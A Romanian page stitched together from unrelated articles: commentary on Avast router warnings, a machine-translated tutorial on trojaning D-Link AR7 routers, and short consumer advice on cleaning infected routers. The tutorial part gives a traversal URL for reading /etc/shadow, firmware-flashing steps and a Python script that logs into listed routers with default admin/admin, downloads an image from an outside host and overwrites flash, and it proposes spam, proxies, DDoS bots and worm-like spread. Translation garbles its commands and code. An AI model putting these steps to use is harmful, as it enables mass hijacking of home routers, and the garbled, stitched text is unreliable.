Acasă Pomi fructiferi Cum să verificați un router pentru viruși. Cum să vă verificați routerul pentru infecția cu VPNFilter. Protecția echipamentelor de rețea împotriva virușilor

Cum să verificați un router pentru viruși. Cum să vă verificați routerul pentru infecția cu VPNFilter. Protecția echipamentelor de rețea împotriva virușilor

Până de curând, nici nu știam că routerul Avast își sperie utilizatorii cu avertismente „înfricoșătoare” referitoare la routerele lor. După cum sa dovedit, antivirusul Avast verifică routerele Wi-Fi. Dă rezultate că routerul este configurat incorect, dispozitivul este vulnerabil la atacuri sau, în general, că routerul este infectat și infectat, iar atacatorii au interceptat deja adrese DNS și te-au redirecționat cu succes către site-uri rău intenționate, fură datele cărților de credit, si in general totul este foarte rau. Toate aceste avertismente, desigur, sunt aromate cu instrucțiuni roșii periculoase și confuze pe care nici măcar un bun specialist nu le poate înțelege fără bere. Nici măcar nu vorbesc de utilizatori obișnuiți. Așa arată problemele găsite pe routerul D-Link DIR-615:

Dispozitivul este vulnerabil la atacuri:

Dintre opțiunile de soluție, desigur, actualizarea firmware-ului routerului. Pentru ce altceva 🙂 Avast poate afișa, de asemenea, un mesaj că routerul tău este protejat de o parolă slabă sau ruterul nu este protejat de hacking.

În unele cazuri, puteți vedea un mesaj care routerul dvs. este infectat iar conexiunile sunt redirecționate către serverul rău intenționat. Avast Antivirus explică acest lucru prin faptul că routerul dvs. a fost spart, iar adresele DNS din acesta au fost schimbate în rău intenționate. Și există și instrucțiuni pentru rezolvarea acestei probleme pentru diferite routere: ASUS, TP-Link, ZyXEL, D-Link, Huawei, Linksys / Cisco, NETGEAR, Sagem / Sagemco.

Pe scurt, toate aceste recomandări au ca scop verificarea adreselor DNS și a serviciilor legate de DNS. Prin intermediul căruia atacatorii pot schimba DNS-ul de pe router și vă pot redirecționa către site-urile lor rău intenționate. Există instrucțiuni detaliate despre cum să verificați totul pe routere de la diferiți producători.

Cum răspund la o alertă de vulnerabilitate a routerului de la Avast?

Cred că toată lumea este interesată de această întrebare. Mai mult, dacă ai intrat pe această pagină. Dacă vă întrebați cum aș reacționa la astfel de avertismente de la antivirus, atunci răspunsul este simplu - deloc. Sunt sigur că Avast ar găsi găuri în routerul meu prin care să mă poată sparge. Am doar Dr.Web. Nu face astfel de verificări.

Poate că greșesc, dar niciun antivirus, altul decât Avast, verifică routerele Wi-Fi la care sunteți conectat pentru diferite tipuri de vulnerabilități. Și această funcție, numită Home Network Security, a apărut în 2015. În versiunea Avast 2015.

Avast scanează routerul pentru probleme de securitate a dispozitivului. Deși, nu înțeleg pe deplin cum o face. De exemplu, cum verifică aceeași parolă pentru a intra în setările routerului. Urmează utilizatorul sau metoda de selecție? Dacă am găsit-o, parola este proastă 🙂 Bine, totuși, nu sunt programator.

Personal, cred că aceste avertismente nu sunt altceva decât simple ghiduri pentru întărirea routerului. Acest lucru nu înseamnă că cineva v-a spart deja și vă fură datele. Ce oferă Avast:

  • Setați o parolă bună și actualizați firmware-ul routerului. Se spune că altfel poți fi piratat. Ok, e de înțeles. Nu trebuie să fie semnalat ca un fel de vulnerabilitate îngrozitoare. Din nou, totuși, nu înțeleg cum detectează antivirusul că versiunea software-ului routerului este învechită. Mi se pare că acest lucru este imposibil.
  • Routerul nu este protejat de conexiunile la Internet. Cel mai probabil, un astfel de avertisment apare după verificarea porturilor deschise. Dar, implicit, funcția „Acces de la WAN” este dezactivată pe toate routerele. Mă îndoiesc foarte mult că cineva va pirata routerul tău prin Internet.
  • Și cel mai rău lucru este falsificarea adreselor DNS. Dacă detectează probleme cu DNS, Avast scrie în text simplu că „Routerul tău este infectat!” Dar în 99% din cazuri, nu este cazul. Din nou, aproape întotdeauna routerul obține automat DNS de la ISP. Și toate funcțiile și serviciile prin care atacatorii pot falsifica cumva DNS-ul sunt dezactivate implicit. Mi se pare că de foarte multe ori antivirusul „înțelege” greșit unele setări ale utilizatorului.

Ceva de genul. Bineînțeles că poți să nu fii de acord cu mine. Mi se pare că este mult mai ușor să accesezi direct un computer și să-l infectezi decât să o faci cu un router. Dacă vorbim despre un atac pe internet. M-ar bucura să văd părerea ta despre asta în comentarii.

Cum îmi protejez routerul și cum elimin avertismentul Avast?

Să încercăm să înțelegem fiecare articol pe care Avast îl verifică cel mai probabil și emite avertismente.

  • Routerul este protejat de o parolă slabă. Nu există criptare.În primul caz, antivirusul va introduce o parolă care trebuie introdusă la intrarea în setările routerului. De obicei, parola implicită este admin. Sau nu este instalat deloc. Și se dovedește că toți cei care sunt conectați la rețeaua dvs. pot intra în setările routerului. Prin urmare, această parolă trebuie schimbată. Cum să faci asta, am scris în articol:. În ceea ce privește parola rețelei Wi-Fi, aceasta trebuie să fie și puternică, iar tipul de criptare WPA2 trebuie utilizat. Despre asta scriu mereu în instrucțiunile de configurare a routerelor.
  • Routerul este vulnerabil din cauza software-ului vechi. Acest lucru nu este în întregime adevărat. Dar, dacă există un firmware nou pentru modelul de router, atunci este recomandabil să-l actualizezi. Nu numai pentru securitate sporită, ci și pentru performanțe mai stabile ale dispozitivului și funcții noi. Avem instrucțiuni despre cum să actualizați software-ul pentru routere de la diferiți producători pe site-ul nostru. Îl puteți găsi prin căutare sau întrebați în comentarii. Asta pentru.
  • Setările DNS au fost modificate. Routerul este spart. Sincer să fiu, nu am văzut încă astfel de cazuri. După cum am scris mai sus, toate serviciile prin care se poate întâmpla acest lucru sunt dezactivate implicit. Cel mai adesea, routerul obține automat DNS de la ISP. Singurul sfat pe care îl pot da este să nu înregistrați manual adresele DNS de care nu sunteți sigur. Și dacă introduceți manual adrese, atunci este mai bine să utilizați numai DNS de la Google, care:. Acest lucru este recomandat și în recomandările Avast, care pot fi vizualizate pe site-ul oficial:. Există instrucțiuni detaliate despre cum să rezolvați problemele DNS pentru aproape toate routerele.

Asta e tot. Sper ca am reusit sa clarific macar putin aceste avertismente in antivirus Avast. Puneți întrebări în comentarii și nu uitați să împărtășiți informații utile despre acest subiect. Noroc!

Bună, cititorul meu! În acest articol voi vorbi despre minunatele routere ADSL
- bucăți de fier de neînlocuit în rețelele casnice și industriale. Îți voi spune despre întrebare
exploatarea acestor bucăți de fier în scopuri benefice nouă – coaserea într-un mod brutal
Troian în interiorul routerului. Și în așa fel încât nici
administrator inteligent, fără utilizator cu urechi.

IQ dorințe sau cerințe

Când am scris acest articol, am presupus că citirea lui ar fi suficientă
utilizator avansat cu GNU\Linux instalat, care are și unele abilități
lucru și programare în acest sistem de operare. Totuși, se pare
este posibil să repet acțiunile mele pe Windows (folosind Cygwin, de exemplu), dar
nu va fi descris. Pentru o plăcere maximă, ai nevoie și tu
abilități în deținerea unui fier de lipit (acest lucru este opțional).

Și totul a început...

Ceva ce am fost distras. Deci, totul a început cu cum într-o zi chiar asta
o bucată de fier, sau mai bine zis, a întrerupt în mod trădător conexiunea la Internet și nu a făcut-o
a vrut să-l restaureze. În același timp, era departe, cu acces fizic
nu era nimeni să o vadă (cu toate acestea, ceva ce am mințit - eram prea lene să mă ridic de pe canapea
reporniți routerul :)), interfața web nu a răspuns, dar mi-am amintit asta
chestia asta trebuie să fie telnet sau ssh. Accesați zona de administrare i
nu am încercat înainte și nu am schimbat imprudent parola pentru contul meu (cum ar fi
s-a dovedit mai târziu, degeaba, pentru că implicit este „admin: admin”). Deci eu
am încercat SSH și a funcționat!

$ ssh [email protected]
$ Parola:

Ca un șurub din albastru! BusyBox! Nu m-am gândit niciodată la sub cui
acest router este sub control, se dovedește - GNU / Linux! M-am simțit înfiorător
Mă întreb cum funcționează totul aici și, mental, datorită lenei și întâmplării, eu
s-a angajat într-un studiu.

Colectarea de informații

Deci de unde am început? Desigur, din lista de comenzi disponibile:

# cutie ocupată
...
Funcții definite în prezent:
[, frasin, busybox, pisică, chgrp, chmod, chown, cp, dată, dd, df, ecou, ​​fals, gratuit,
grep, nume de gazdă, id, ifconfig, init, insmod, kill, ln, autentificare, ls, lsmod, mkdir,
modprobe, mount, mv, passwd, ping, ps, pwd, repornire, rm, rmmod, traseu, sh, somn,
sincronizare, gudron, testare, tftp, atingere, adevărat, tty, umount, wget, whoami, da

Setul este destul de sănătos, suficient pentru cercetarea normală și implementarea ideilor.
Următorul a trezit interesul pentru versiunea de kernel:

# cat / proc / versiune
Linux versiunea 2.4.17_mvl21-malta-mips_fp_le ( [email protected]) (gcc versiunea 2.95.3
20010315 (lansare / MontaVista)) # 1 Thu Dec 28 05:45:00 CST 2006

Pentru referință: MontaVista este o distribuție încorporată
sisteme. Marea majoritate a producătorilor de echipamente de rețea oferă
preferinta pentru acest sistem. Poate fi găsit și pe alte dispozitive, de exemplu, în
cărți electronice sau telefoane mobile.

# cat / etc / versiuni
CLIENT = DLinkRU
MODEL = DSL-500T
VERSIUNEA = V3.02B01T01.RU.20061228
HTML_LANG = EN.302
BOARD = AR7VW
VERSION_ID =
CPUARCH_NAME = AR7
MODEL_ID =
FSSTAMP = 20061228055253

# cat / proc / cpuinfo
procesor
: 0
model CPU
: MIPS 4KEc V4.8
BogoMIPS
: 149.91
așteptați instrucțiune: nu
temporizatoare de microsecunde: da
vector de întrerupere suplimentar: da
Punct de supraveghere hardware: da
Excepții VCED: nu sunt disponibile
Excepții VCEI: nu sunt disponibile

AR7 este un cip dual-core dezvoltat de Texas Instruments. El
conține un router ADSL cu drepturi depline pe un singur cip care acceptă standardele ADSL1,
ADSL2, ADSL2 +. Bazat pe procesor MIPS 4KEc RISC de înaltă performanță, cu
frecvența ceasului 175 sau 233 (în funcție de tehnologia de producție: 18 microni
sau 13 microni). Cipul conține la bord 2 interfețe UART, dintre care una (UART_A)
este folosit pentru a afișa informații de depanare, precum și o interfață EJTAG care servește
pentru depanare (intermitent) Memorie flash. Utilizarea acestor interfețe va fi
descris mai jos.

În cele din urmă, m-am uitat la informațiile de memorie:

# cat / proc / monturi
/ dev / mtdblock / 0 / squashfs ro 0 0
niciunul / dev devfs rw 0 0
proc / proc proc rw 0 0
ramfs / var ramfs rw 0 0

# cat / proc / mtd
dev: size erasesize nume
mtd0: 0034f000 00010000 „mtd0”
mtd1: 00090f70 00010000 „mtd1”
mtd2: 00010000 00002000 „mtd2”
mtd3: 00010000 00010000 „mtd3”
mtd4: 003e0000 00010000 „mtd4”

Desigur, fără a uita de adresele de bloc:

# cat / proc / ticfg / env | grep mtd
mtd0 0x900a1000,0x903f0000
mtd1 0x90010090,0x900a1000
mtd2 0x90000000,0x90010000
mtd3 0x903f0000,0x90400000
mtd4 0x90010000,0x903f0000

Din cele de mai sus, a rezultat că memoria Flash (/ dev / mtdblock) are 5 blocuri:

mtd0- Imaginea sistemului de fișiere SquashFs. Acesta este un fișier special
un sistem comprimat doar pentru citire. Pentru
compresie, se folosește algoritmul gzip, dar în acest caz - LZMA (raport de compresie
de mai sus). Dimensiunea acestui bloc este de 4 MB.

mtd1- acest bloc conține nucleul MontaVista comprimat de algoritmul LZMA
stare, dimensiune bloc 600 KB.

mtd2- Bootloader ADAM2, realizează boot-ul kernel-ului, are și
Serviciu server FTP pentru recuperare și intermitent. Mai multe detalii despre el vor fi
spuse mai departe. Dimensiunea blocului este de 64 KB.

mtd3- partajat între datele de configurare și mediu
bloc (variabile de mediu), care poate fi vizualizat în / proc / ticfg / env.
Datele de configurare se află în /etc/config.xml. Intermediar între dosar
sistem, blocul de configurare este unul închis (ca toate cm_ *, control, oh
ei mai târziu) programul cm_logic. Dimensiunea acestui bloc este, de asemenea, de 64 KB.

mtd4- acesta conține semnătura firmware-ului, nucleul și imaginea fișierului
sisteme. Acest bloc este utilizat la actualizarea firmware-ului prin interfața Web.
Inițial, este stocat în acest bloc, apoi este verificată suma de control
și, dacă converge, se înscrie pentru noua sa poziție.

RAM (16 MB la acest model, dar ADAM2 la acest model
vede doar 14 MB, este tratat cu o actualizare), montat în directorul / var și acesta
puteți utiliza în siguranță în scopurile noastre:

#liber
totalul de buffere partajate gratuite utilizate
Mem: 14276 10452 3824 0

Să nu uităm să trecem peste lista de procese. Dintre cele interesante au pândit aici
demoni: thttpd - Web-server; dproxy - serverul proxy care memorează în cache cererile DNS; ddnsd
- daemon DNS; pppd ... - demonul real care implementează conexiunea prin protocol
PPP, iar în parametri vedem datele contului. Deci, dacă routerul nu
se preface a fi un furtun (a se citi - nu în modul pod), atunci poți
ușor să obții un cont.

Programele cm_ * sunt proprietare și sunt deja incluse în codurile sursă.
compilate (aceste programe sunt dezvoltate și de Texas Instruments, pe D-Link
nu trebuie să înjurați pentru nerespectarea licențelor).

cm_logic- un program care controlează logica sistemului, prin intermediul acestuia
configurația trece prin; sincronizează /etc/config.xml cu
partea corespunzătoare a conținutului / dev / ticfg (care indică mtd3).

cm_cli- interfață de linie de comandă pentru management și configurare
sisteme. De exemplu, setările de conectare se fac prin această interfață.

cm_buc- rulează și monitorizează procesele, legături către reguli
(de exemplu, rulați programul ca demon, regulile includ și informații despre
porturi de deschis) descrise în /etc/progdefs.xml; încărcat imediat după
miezuri.

webcm- Interfață CGI, plină de găuri, de exemplu vă permite să priviți / etc / umbră,
doar prin referire la url.

http://192.168.1.1/../../../etc/shadow

Nu am nimic, thttpd nu este atât de simplu, dar dacă da:

http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow

Alt lucru. Acesta poate fi folosit pentru a colecta informații dacă nu există acces la
ssh / telnet, dar există acces la interfața web.

firmwarecfg- utilizat pentru firmware prin interfața Web. La intrare
a acestui program, o imagine este trimisă de pe interfața Web printr-o solicitare POST și este deja
redirecționează către memoria Flash, după verificarea sumei de control a imaginii.

Acest lucru completează colectarea de informații primare, este timpul să trecem la decisiv
actiuni.

Instalarea instrumentelor de dezvoltare și compilarea firmware-ului

Firmware pentru routerele D-Link (și toate celelalte bazate pe GNU / Linux)
distribuite sub licență GPL, le puteți obține la oficial
server FTP. De fapt, puteți alege oricare din lista de firmware-uri sugerate,
sunt aceleași (în ceea ce privește seria T). Livrarea conține codul sursă al nucleului, al mediului,
instrumentele și lanțul de instrumente necesare pentru a dezvolta / compila existente
programe. Ar trebui să fie despachetat la rădăcină și adăugat la variabila de mediu
Calea PATH către directorul bin al lanțului de instrumente:

$ tar xvf tools.tgz
$ export PATH = $ PATH: / opt /

Acum, pentru a compila propriul firmware, accesați directorul
cu codurile sursă și executați acest make.

$ cd DSL / TYLinuxV3 / src && make

Vor fi adresate multe întrebări despre activarea suportului pentru dispozitiv (mai bine
raspunde-le pozitiv). La sfârșitul compilației în directorul TYLinuxV3 / images
vor fi create imagini de firmware. De asemenea, puteți rula scriptul cu același nume cu al dvs
model din directorul / TYLinuxV3 / src / scripts.

Câteva cuvinte despre transferul de fișiere între un router și un computer. Chiar primul
metoda pe care am aplicat-o este capacitatea de a transfera fișiere folosind protocolul SSH,
folosind programul scp. Dar puțin mai târziu am aflat că mc (Midnight
Commander) are și capacitatea de a se conecta prin SSH (Panel -> Conexiune Shell).
Alternativ, puteți configura un server Web sau FTP la locul de muncă. Mai tarziu eu
a dat preferință serverului web, pentru că funcționează cel mai rapid. am instalat
thttpd, mic și rapid, la fel ca pe un router. O pornim și o tragem
fișierul router, după ce ați accesat directorul / var (așa cum s-a menționat
disponibil anterior pentru înregistrare).

$ thttpd -g -d ~ / ForRouter -u utilizator -p 8080
# cd / var
# wget http://192.168.1.2/file

Pentru a extrage fișierul de pe router, puteți deschide și serverul web:

# thttpd -g -d / var -u root -p 8080

Atenție, dacă doriți să descărcați fișierul executabil de pe router, ar trebui
elimina drepturile de lansare. Când descărcați un număr mare de fișiere de pe un router
este mai bine să folosiți mc, nu va trebui să copiați mai întâi fișierele în / var și
eliminați drepturile și apoi ștergeți aceste fișiere pentru a elibera spațiu. În general, cazul
gust, alege orice variantă care ți se potrivește.

Crearea propriului program

Să începem, desigur, cu clasicul program HelloWorld. Unele speciale
nu sunt reguli. Textul programului este dureros de familiar:

#include
#include

int main (void)
{
printf ("Mate.Feed.Kill.Repeat.");
returnează 0;
}

Compilare (calea către lanțul de instrumente „și trebuie specificată în variabila de mediu
CALE):

$ mips_fp_le-gcc hell.c -o iad
$ mips_fp_le-strip -s iadul

# cd / var
# chmod + x iad
# ./iad

Și... nu se va întâmpla nimic, sau o cale negăsită de alertă va fi aruncată. Ce este
o afacere? Am vorbit deja despre cm_pc - acest program lansează altele în
conform regulilor descrise în /etc/progdefs.xml. Acum a sosit momentul
modificați și flash imaginile sistemului de fișiere.

Modificarea sistemului de fișiere

Pentru a modifica sistemul de fișiere, mai întâi trebuie
despacheta. După cum am menționat, sistemul de fișiere de aici este SquashFs cu patch-ul LZMA.
Pachetul pentru dezvoltarea firmware-ului include doar programul mksquashfs (pentru a crea
imagine), unsquashfs (pentru despachetare) lipsește. Dar nu contează, totul este disponibil
pe site-ul sistemului de fișiere, avem nevoie de prima versiune. Prin aplicarea unui plasture LZMA și
după ce au adunat utilitățile, le-am așezat într-un loc convenabil. În primul rând, obținem imaginea
sistem de fișiere de la router:

# cat / dev / mtdblock / 0> /var/fs.img

$ mkdir unpacked_fs
$ unsquashfs fs.img unpacked_fs

Acum îl puteți modifica după cum doriți, sau putem arunca FuckTheWorld în
directorul / bin și adăugați o regulă pentru a rula în /etc/progdefs.xml.

$ cp salut unpacked_fs / bin
$ vim unpacked_fs / etc / progdefs.xml

Și adăugați acest lucru (între etichete ):

iad
/ bin / iad

Economisim și împachetăm înapoi:

$ mksquashfs unpacked_fs my_fs.img -noappend

Vă rugăm să rețineți că imaginea sistemului de fișiere nu trebuie să depășească
dimensiuni admisibile. Dacă ai dorința de a încerca ceva urgent și nu
fit, eliminați din imagine ceva „inutil” precum grep, whoami sau
utilizați programul de ambalare executabil UPX. Acum încărcați pe router
imagine și treceți la secțiunea următoare.

Captură imagine sistemului de fișiere

Metoda de flashing a routerului este foarte simpla, consta in accesarea dispozitivului
/ dev / mtdblock / *. Deci, încărcăm pe router în orice mod convenabil imaginea fișierului
sisteme și faceți această acțiune simplă:

# cat my_fs.img> / dev / mtdblock / 0 && reporniți

# cp my_fs.img / dev / mtdblock / 0 && reporniți

După un timp, când procesul de înregistrare a trecut, routerul se va reporni și
modificările vor intra în vigoare. Încercând să rulăm exemplul nostru:

# iad
Mate.Feed.Kill.Repeat.

Metode de recuperare în caz de defecțiune

Înainte de a intermite router-ul cu „crafts” mai serioase, ar trebui să aflați cum
cum să acționați în cazurile critice când routerul refuză
sarcină. Nu există situații fără speranță. Serverul FTP ADAM2 vine în ajutor. Pentru
mai întâi trebuie să rulați clientul FTP la adresa IP a ADAM2, care poate fi spionată
în / proc / ticfg / env (parametrul my_ipaddress).

$ ftp 192.168.1.199
220 ADAM2 FTP Server gata.
530 Vă rugăm să vă autentificați cu USER și PASS.

Pentru claritate, puteți activa modul de depanare, apoi totul
informații și toate răspunsurile FTP:

Autentificare / parolă - adam2 / adam2. Procesul de intermitent este foarte simplu. A începe
transferați sesiunea FTP în modul binar:

ftp> citat MEDIA FLSH

Acum trimitem, de exemplu, o imagine a sistemului de fișiere și indicăm locația
destinaţie:

ftp> pune fs.img „fs.img mtd0”

Așteptăm sfârșitul înregistrării, reporniți routerul, ieșim din sesiune:

ftp> citat REBOOT
ftp> ieși

Tot! După cum poți vedea, nu este nimic dificil, acum dacă ceva nu merge bine, tu
poți oricând să remediezi situația.

Pentru confortul muncii, ar trebui să dați o adresă IP normală, activați
incarcare automata (pentru a nu dansa cu resetare) si mariti putin timpul
așteptând o conexiune înainte de a încărca nucleul. Toți acești parametri sunt stocați în
variabile de mediu, există comenzi speciale FTP ADAM2: GETENV și SETENV (pentru
obținerea și, respectiv, setarea unei variabile). În sesiunea FTP, introduceți următoarele
comenzi:

ftp> SETENV autoload, 1
ftp> SETENV autoload_timeout, 8
ftp> SETENV adresa_miu, 192.168.1.1
ftp> citat REBOOT
ftp> ieși

Routerul repornește și vă puteți conecta la ADAM2 la 192.168.1.1:21. Dacă
va exista dorința de a reflash imaginea nucleului, iar nucleul va refuza să pornească, FTP
va începe singur. Înainte de a afișa intermitent imaginile modificate, asigurați-vă că
economisiți curentul pentru recuperare. În general, puteți modifica variabilele de mediu
și prin / proc / ticfg / env, am vrut doar să vă spun mai multe despre lucrul cu FTP.

# echo my_ipaddress 192.168.1.1> proc / ticfg / env

Și puteți verifica modificările astfel:

# cat / proc / ticfg / env | grep adresa_miu

Ce să faceți dacă doriți să încercați să reîncărcați bootloader-ul și cum
sa actioneze in caz de esec? Fie routerul nu pornește dintr-un motiv oarecare și
nu are acces la ADAM2? Există o cale de ieșire - JTAG, sau mai degrabă, acest cip conține EJTAG
(versiunea extinsa). Este o interfață pentru depanare/programare în circuit.

Pentru a vă conecta la această interfață, avem nevoie de portul LPT al computerului,
conectori și 4 rezistențe. Schema este foarte simplă.

Mă grăbesc să observ că firmware-ul prin JTAG nu este rapid, va dura destul
mult timp. Deci, merită folosit doar pentru a restabili bootloader-ul,
chiar dacă nu funcționează. Pentru a comunica prin JTAG, ar trebui să utilizați un special
un program precum UrJTAG. Mai jos este un exemplu despre cum funcționează această interfață.
Stabilirea unei conexiuni:

jtag> cablu paralel 0x378 DLC5
jtag> detect

Detectare memorie flash:

jtag> detectflash 0x30000000 1

Citirea memoriei flash:

jtag> readmem 0x30000000 0x400000 fullflash.img

Scriere în memorie (bootloader):

jtag> flashmem 0x30000000 adam2.img

De asemenea, este util să știți despre interfața UART (am promis că voi vorbi despre asta mai devreme). V
UART_A raportează, adică înregistrează bootloader-ul (într-un stadiu incipient al încărcării de la
poti vorbi cu el) si miezul. Când scrieți nuclee modificate, este
indispensabil pentru depanare. UART - Receptor/Transmițător asincron universal
(transceiver universal asincron) este aproape întotdeauna prezent
microcontrolere.

Circuitul adaptorului este foarte simplu. Bazat pe un singur microcircuit -
Convertor de nivel TTL: MAX232 pentru COM și FT232R pentru USB. Microcircuite
sunt destul de comune și nu vor fi probleme cu achiziția.

Circuitul este asamblat pe o placă (care poate fi amplasată cu ușurință în carcasă
conector port COM) în 20 de minute și aduce o mulțime de beneficii. De exemplu, la depanare
nucleele sunt o soluție absolut de neînlocuit. Și dacă electronicele sunt strânse? Ieșire
sunt cabluri USB pentru telefoane vechi, au doar un convertor
UART - USB.

Câteva idei de distribuție

Proxy-ul/sox-ul tău pe routerul altcuiva este grozav. Ca, de fapt, și spam
peste toate protocoalele router. Acesta nu este un computer Windows pentru tine, care
reamenajat lunar :). Deseori, routerele nu se schimbă sau nu se reflashează. da si
Cine în afară de noi va avea în cap ideea unei infecții cu router?

Nu uitați, avem tot traficul de la utilizator/rețea sub controlul nostru. Pentru mai mult
routere puternice, este deja posibil să suspendați un bot DDOS. Ascunde fișierul / ascunde procesul,
interceptați scrierea în blocuri mtd, eliminând ștergerea programului nostru - tot ceea ce
tot ceea ce!

Să presupunem că sunteți pe cale să începeți să scrieți un program serios pentru un router.
Depanarea foarte bună este importantă, probabil că va trebui să o faci de mai multe ori
rescrie/restaurează imagini... Aceasta este o perspectivă foarte tristă. Chiar și mâinile
coboară puțin, dacă mai ținem cont că resursa de rescriere a memoriei Flash
mic (pentru mai multe detalii vezi documentația pentru cipul de memorie), și există o perspectivă
lasa ea. Dar există o cale de ieșire! Qemu poate emula AR7! Vă puteți imagina ce
oferă posibilități și confort nesfârșit? Acum nimic nu ne stă în cale
scrie ceva incredibil de tare!

Asa de. Ai scris un program, l-ai verificat pe cont propriu sau pe routerele altor 1-2, dar la urma urmei
toată rețeaua este încă înainte, infectarea manuală este tristă, pornești deja pe al 10-lea router
blestemă lumea întreagă, și plutește în ochii șirurilor de „cat” și „mtd”. Vom scrie
un program pentru automatizarea acestor acțiuni de rutină. Am ales limbajul python.

Planul de lucru este următorul:

  • compilarea unei liste de routere, de exemplu, folosind nmap;
  • scriptul ar trebui să ia din listă în ordinea adresei IP, treceți
    telnet cu un login/parolă standard;
  • apoi aceleași acțiuni: încărcați imaginea modificată,
    suprascrie, repornește.

#! / usr / bin / env python
# Codificare = UTF-8

import telnetlib, ora

SERVER = „http://anyhost.com/fs.image”

pentru addr în deschis ("iplist.txt"):
telnet = telnetlib.Telnet (adresă)
telnet.set_debuglevel (1)
telnet.read_until ("conectare:")
timp.somn (5)
telnet.write ("admin \ n")
telnet.read_until ("Parola:")
telnet.write ("admin \ n")
telnet.read_until ("#")
telnet.write ("cd / var && wget" + SERVER)
telnet.read_until ("#")
telnet.write ("cat fs.image> / dev / mtdblock / 0")
telnet.read_until ("#")
telnet.write ("repornire")
telnet.close ()

Logica scenariului este foarte departe de a fi ideală, acum voi explica de ce. Pentru
mai întâi, ar trebui să verificați versiunea de firmware/kernel și modelul de router, deoarece ar putea exista
diferențe serioase în muncă. Mai mult, în loc de spații de firmware, ar trebui să pompați
imaginea sistemului de fișiere de pe router, despachetați, modificați și trimiteți
înapoi. Acest lucru va elimina problemele de compatibilitate între diferite
modele / versiuni de firmware, deoarece stabilitatea muncii este cel mai important lucru pentru tine.
De asemenea, virusul poate avea funcțiile unui vierme și, dacă doriți, puteți oricând
înșurubați un scanner de rețea, forță brută pentru RDP și cipuri similare cu acesta.

Există o altă metodă grozavă de distribuție. Nimic nu te împiedică să scrii
program pentru Windows, care va avea cu dvs. (sau descărcați de pe dvs
server) imaginea sistemului de fișiere și infectați routerul cu aceasta, dacă este prezent.
Redistribuiți acest program prin toate mijloacele „standard”: unități amovibile,
exploit-uri pentru programe, infectarea altor programe... Prin combinarea acestor metode,
poți crea o pandemie gravă. Imaginează-ți imaginea asta - până la urmă
astfel de dispozitive sunt omniprezente.

Protecție router

După ce am dezgropat toate acestea, m-am gândit: cum poți proteja un router? Și apoi, vezi, și
O voi lua eu. Primul pas este schimbarea parolei utilizatorului într-o parolă mai complexă și
lung (limită - 8 caractere), schimbați bannere și felicitări de serviciu
(cu un editor hexadecimal, sau, ceea ce este de preferat, recompilați programele), astfel încât
nmap sau alte scanere nu au putut detecta versiunile de servicii.

De asemenea, ar trebui să schimbați porturile pe care se agăță demonii. Acest lucru este realizat de
modificări progdefs.xml. Omorâți telnetul (cel mai ușor mod de a găsi o parolă pentru el, da
iar protocolul este neprotejat, de ce avem nevoie), porniți firewall-ul, permiteți conexiunea
la servicii numai de la propria dumneavoastră adresă IP sau MAC. Utilizați și un firewall
pentru a proteja o rețea sau un computer, nu degeaba este prezent. Setare competentă
regulile te vor ajuta întotdeauna să te aperi.

Concluzie

Multe, nu numai routerele D-Link și alte dispozitive similare sunt construite
Cipul AR7, lista include Acorp, NetGear, Linksys, Actionec... drăguț
acest AR7 este popular împreună cu MontaVista. De aici rezultă că folosind același lucru
toolchain, puteți efectua fără probleme pașii descriși în articol.

Gândește-te bine: pe lângă acțiunile rău intenționate, poți să faci și ceva util/plăcut pentru tine
și altele (nu mă cert, plăcerea de a hacking nu poate fi înlocuită, dar totuși).
Vă puteți crea propriul firmware, de exemplu, routere mai puternice capabile
descărcați/distribuiți torrente... Toate modelele au interfață USB 1.1, dar la cele mai tinere
modele, nu este lipit. Adăugați un modul USB și un driver de sistem de fișiere la kernel,
echipați routerul cu memorie Flash - și, ca rezultat, obțineți un fel de stocare în rețea pentru
putini bani. Există o mulțime de opțiuni, iar ideile ar trebui să apară în mii - nu
limitează-te, creează și creează!

În lumina numărului tot mai mare de cazuri de falsificare DNS de către programele rău intenționate pe dispozitivele utilizatorilor de internet, se pune problema securității routerelor Wi-Fi. Cum să verificați un router pentru viruși? Cum să eliminați un virus dintr-un router? Întrebarea este complexă și simplă în același timp. Există o soluție!


Virusul în sine nu se poate scrie pe majoritatea routerelor moderne din cauza spațiului mic din memoria routerului în sine, dar poate zombi routerul pentru a participa la o rețea botnet. De regulă, aceasta este o rețea bot pentru a ataca diverse servere sau pentru redirecționarea și analiza fluxurilor de informații care vă lasă pe Internet.

Parolele și corespondența personală pot cădea în mâinile intrușilor!

Acest lucru trebuie remediat cât mai curând posibil.

  • Resetarea setărilor routerului
  • Firmware-ul routerului
  • Reconfigurare

Resetarea setărilor routerului

Puteți reseta setările routerului apăsând butonul de resetare. De obicei, acest buton este situat pe partea din spate a routerului, unde sunt porturile LAN. De obicei butonul este încastrat în orificiu pentru a evita apăsarea accidentală, așa că trebuie să folosiți o scobitoare. aceasta va șterge setările routerului modificate de virus și va instala setările din fabrică în locul lor. Trebuie să vă avertizez că dacă nu știți cum să configurați routerul, atunci haldă setările sale pentru dvs nu merita!

Firmware-ul routerului

Uneori virusul „inundă” firmware modificat la router. Puteți elimina firmware-ul virusului de pe router prin flash-ul din nou.

Conectați computerul la router cu un cablu LAN. Un cablu LAN este inclus cu orice router. Sau prin Wi-Fi dacă nu există conexiune prin cablu. Mai bine te conectezi cu un cablu! Conexiunea wireless este considerată instabilă și nu este potrivită pentru firmware-ul routerului.

După ce ne-am conectat la router, deschidem browserul (Chrome, Opera, Mozilla, IE) și introducem adresa router-ului ASUS în bara de adrese, pentru Asus este 192.168.1.1, în pagina care se deschide, vei avea nevoie pentru a introduce datele de conectare și parola pentru a intra în setările routerului. Autentificare: admin, Parola: admin. Daca login-ul si parola nu sunt potrivite, intreaba-l pe cel care ti-a setat routerul, poate le-a schimbat.

Descărcați firmware-ul de pe site-ul producătorului și selectați firmware-ul de pe disc folosind pagina de setări a routerului. Pentru marea majoritate a routerelor, pașii de firmware sunt aceiași.

Problemele la distribuirea Wi-Fi folosind un router apar din diverse motive. Una dintre ele este infectarea distribuitorului cu un virus de care poți scăpa singur.

  • un virus care încetinește viteza Internetului în diverse moduri. De exemplu, un astfel de software rău intenționat dă jos setările firmware-ului sau începe să descarce conținut publicitar viral pe computer;
  • un virus care falsifică adresele site-urilor. Arata astfel: un utilizator viziteaza orice site securizat cunoscut, iar virusul schimba DNS-ul in asa fel incat utilizatorul ajunge la un site de publicitate sau vede bannere publicitare in care proprietarii site-ului nu le-au plasat. Un astfel de virus este și periculos prin faptul că vă poate transfera pe un site care conține alți viruși.

